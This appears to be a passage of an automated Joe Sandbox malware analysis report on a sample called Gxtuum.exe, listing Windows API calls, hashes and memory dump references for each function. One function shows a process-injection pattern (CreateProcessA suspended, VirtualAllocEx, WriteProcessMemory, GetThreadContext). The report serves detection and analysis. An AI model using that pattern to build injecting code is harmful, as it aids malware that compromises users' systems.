GetLastError.KERNEL32(?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000,?,00118482,8B18EC83), ref: 0012790D

Part of subcall function 001278D3: CloseHandle.KERNEL32(FFFFFFFE,0012791D,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000), ref: 001278E3

___initconout.LIBCMT ref: 0012791D

Part of subcall function 00127895: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001278C4,001243BF,00000000,?,00117F36,?,?,00000000,?), ref: 001278A8

WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?), ref: 00127932

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
Instruction ID: a5fab39a772c374668663e7a4972fa37f32441ab9ad3699f56f8c97b5a8a5db8
Opcode Fuzzy Hash: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
Instruction Fuzzy Hash: 39F0AC3A504165BBCF221F95EC08A9B3F66EB1A3A5B144014FE1DD5570D73298A0DB91

Function 00109F5A Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNEL32(?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F7D
LeaveCriticalSection.KERNEL32(00148FA8,0014CDC0,?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F87
WaitForSingleObjectEx.KERNEL32(0014CDC0,00000000,?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F98
EnterCriticalSection.KERNEL32(00148FA8,?,00109EF7,00000064,?,000E8A41,0014CDC0), ref: 00109F9F

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
Instruction ID: 7fc890cc1a2e8175487242a3c7a38a916c6e1a7ccb1699aa892ba709e2b7949e
Opcode Fuzzy Hash: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
Instruction Fuzzy Hash: 2AE04F36A45125BBCB012F50EC09ACEBF2AFF59B72B104111FA09A69B0CFB119959BD4

Function 00114AF9 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00114B02

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 00114B15
_free.LIBCMT ref: 00114B26
_free.LIBCMT ref: 00114B37

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
Instruction ID: 73a21dbac150b872c4e8a393ee24ea20b7118106b4e4c68bc573bdbb81c4db73
Opcode Fuzzy Hash: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
Instruction Fuzzy Hash: 8DE0E6BD8112209ECB556F15FC418C7BE62F79A754342801EF41C22A31DB3945D29F95

Function 0011385D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001138ED

Strings

pow, xrefs: 001138C5, 001138E2

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
Instruction ID: fa417983987e14404107ffa1355b92535a7fd53028fb9cf4e7c0fa69bab56c22
Opcode Fuzzy Hash: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
Instruction Fuzzy Hash: A751CD61A0820596CB1D7794C9113FE6BE5EB60B58F208E79F8E1422ACFF348DD4DB42

Function 00113F62 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, xrefs: 00113FA5, 00113FAC, 00113FE2

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
API String ID: 0-1719652438
Opcode ID: 4e7ab262a72269248bb2bc06d2742f7b514ffa54077f01a489952fb6bdc3edc6
Instruction ID: 2cee17ab87825b8060a7fe6356f4d1e9660e4418fdfc30c2bac0dfd742a692ca
Opcode Fuzzy Hash: 4e7ab262a72269248bb2bc06d2742f7b514ffa54077f01a489952fb6bdc3edc6
Instruction Fuzzy Hash: 5E41A071E00215AFDB299F9ADC819DFBBB8EF99710B11007AF508D7251E7718AC1CB51

Function 0010D4BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0010D4E1

Strings

RCC, xrefs: 0010D4FB
MOC, xrefs: 0010D4F3

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
Instruction ID: 1886c81d0d480946ecc023a2ab4ac0665e698a96b821414bee634b58825ecf7b
Opcode Fuzzy Hash: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
Instruction Fuzzy Hash: 3A419C71900209AFCF16DF98DC81AEEBBB5FF08304F188059F945A7291D3B59A51CF51

Function 000E44C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000E44EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000E453A

Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D5D
Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D81

Strings

bad locale name, xrefs: 000E4556

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 38357056dc3681d9bd6c1fdb624cf9cf8aa67c13d7dfbac2ddbb59af6fd5f1d6
Instruction ID: 08ed8cd8c2d6ee9475fad4bb9ff19b353030f07b0f6207117633d18b076d5d9c
Opcode Fuzzy Hash: 38357056dc3681d9bd6c1fdb624cf9cf8aa67c13d7dfbac2ddbb59af6fd5f1d6
Instruction Fuzzy Hash: 0411A071904B849FD320CF69C901747BBE8EF29710F008A1EE499D7B81E7B5A504CB95

Analysis Process: Gxtuum.exePID: 7052, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	106
Total number of Limit Nodes:	3

Executed Functions

Function 0010E250 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0010E24F,?,?,?,?,?,0010F4C2), ref: 0010E272
TerminateProcess.KERNEL32(00000000,?,0010E24F,?,?,?,?,?,0010F4C2), ref: 0010E279
ExitProcess.KERNEL32 ref: 0010E28B

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 6b17f8363c27f1fe96dedabc28d7fda2d55ecde51168805203d53f6cb9e8c05c
Instruction ID: 77a1d3520e7e33c377c4f5f19e12c5ec79420782ca2bc9ad09cf3f728f245022
Opcode Fuzzy Hash: 6b17f8363c27f1fe96dedabc28d7fda2d55ecde51168805203d53f6cb9e8c05c
Instruction Fuzzy Hash: ACE0B631140208BFCF116B69DD099493FADFB60781B208814F845D6571CB75DD91CA40

Function 00118A75 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 00118ACC
ext-ms-, xrefs: 00118AE0

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
Instruction ID: a82b5adcd954ad7f0e3dcdc57576528fec47ee88254e5a4d3444e57df6cc0b8c
Opcode Fuzzy Hash: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
Instruction Fuzzy Hash: F021E7B1A09211ABDB298B34AC85A9F37699F05760F254131FC16A72D1DF30EC80C6E4

Function 00117317 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00111657,000E2397), ref: 0011731C
_free.LIBCMT ref: 00117379
_free.LIBCMT ref: 001173AF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00111657,000E2397), ref: 001173BA

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
Instruction ID: 650df2c772ed50ac7aa94581746e03e90f8293cb4080893dc4d474f4b90a7816
Opcode Fuzzy Hash: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
Instruction Fuzzy Hash: B41186362186017BDB5D26B9AC81EEB256AABE27747250334F935D32F1DF61CCC16121

Function 00118B3C Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b552a1b33a676a7feaaeae512d17e141dc0ee8320f1806c9d1231bfb8d4e0d
Instruction ID: f5dbb0c36a39b34ebf8691ed2016b4c133a4d0104b1b695e400139785fafc8ce
Opcode Fuzzy Hash: 94b552a1b33a676a7feaaeae512d17e141dc0ee8320f1806c9d1231bfb8d4e0d
Instruction Fuzzy Hash: 9A01F1B7708611AFDF2E8F2AEC8199A37D6ABC6764325C130F901DB1A4DF30D8818684

Function 0011AB80 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00117362,00000001,00000364,00000006,000000FF,?,00111657,000E2397), ref: 0011ABC1

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 37bb2b4fe3971e7417b102b21301f2427ca421a292db0d1b981ea862cb71b576
Instruction ID: ef7271fc7cc85ef3315b4a3086c735f21d4a818e95fb6cc819ccac44e1df5705
Opcode Fuzzy Hash: 37bb2b4fe3971e7417b102b21301f2427ca421a292db0d1b981ea862cb71b576
Instruction Fuzzy Hash: 62F0E93560E2647BDB6D1A669C01FDB3F4AAF417B0B554035FC19D6094CB21D8C182E6

Non-executed Functions

Function 000E8070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000E809D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000E80FB
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000E8114
GetThreadContext.KERNEL32(?,00000000), ref: 000E8129
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 000E8149
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 000E818B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 000E81A8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000E8261

Strings

invalid stoi argument, xrefs: 000E8057
VUUU, xrefs: 000E7F01
, xrefs: 000E8140

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 127d13260c90c77a7562afea044efee8eab4d11af34ecc7a374f22d218b193d9
Instruction ID: 3bcdc2808f5afaff9d46d60c7d64e03b759be57777b776006b3a493180bff5aa
Opcode Fuzzy Hash: 127d13260c90c77a7562afea044efee8eab4d11af34ecc7a374f22d218b193d9
Instruction Fuzzy Hash: C6417F70644341BFD7609F61DC06F96BBE8FF88B01F004419B788E65E0DBB0A994CB96

Function 00122CA2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D3B
GetLocaleInfoW.KERNEL32(00000000,20001004,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D64
GetACP.KERNEL32(?,?,00122FC0,?,00000000), ref: 00122D79

Strings

OCP, xrefs: 00122CF6
ACP, xrefs: 00122CC0

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
Instruction ID: 79147b9964d36a45b27890066eb72939872cd3436922da64e5e6cf33a6a9d020
Opcode Fuzzy Hash: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
Instruction Fuzzy Hash: 8A21C532600128BBD7398FA4E900BDF73A6FF50B60B5A8164E90ADB215E772DD61C750

Function 00122E77 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001171C0: GetLastError.KERNEL32(?,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 001171C5
Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 00117263

Part of subcall function 001171C0: _free.LIBCMT ref: 00117222
Part of subcall function 001171C0: _free.LIBCMT ref: 00117258

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00122F83
IsValidCodePage.KERNEL32(00000000), ref: 00122FCC
IsValidLocale.KERNEL32(?,00000001), ref: 00122FDB
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00123023
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00123042

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 11c98b213c349d5ea30d51a98e98be7179e171d3b811b2f713383cad3ec8ae18
Instruction ID: 06cf2b9bdd7f5b03b7123ffc4bd472728ca51fb3fd3a0752b21b399309770482
Opcode Fuzzy Hash: 11c98b213c349d5ea30d51a98e98be7179e171d3b811b2f713383cad3ec8ae18
Instruction Fuzzy Hash: 2B51AF71A00225BFDB20EFA4ED41AFEB7B8BF18700F190429F900E7190E7B09964CB61

Function 0010A895 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0010A8A1
IsDebuggerPresent.KERNEL32 ref: 0010A96D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0010A98D
UnhandledExceptionFilter.KERNEL32(?), ref: 0010A997

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 947cf73968401b4cfbbd9ec097a3a606a5f8fe733a1dba11415a5d8c98e9bd5c
Instruction ID: 921b209c6bde3662dd67bc18a67481e3f792c1df94e1fd634f04693d8104e4df
Opcode Fuzzy Hash: 947cf73968401b4cfbbd9ec097a3a606a5f8fe733a1dba11415a5d8c98e9bd5c
Instruction Fuzzy Hash: E2312775E05318DBDB20DFA0D9897CDBBB8BF18304F1041AAE44DAB290EBB05A85CF45

Function 001097DD Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001097E3
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001097F1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00109802
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00109813
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00109824
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00109835
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00109846
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00109857
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00109868
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00109879
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0010988A
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0010989B
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001098AC
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001098BD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001098CE
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001098DF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001098F0
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00109901
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00109912
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00109923
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00109934
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00109945
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00109956
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00109967
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00109978
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00109989
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0010999A
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001099AB
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001099BC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001099CD
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001099DE
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001099EF
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00109A00
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00109A11
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00109A22
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00109A33
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00109A44
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00109A55
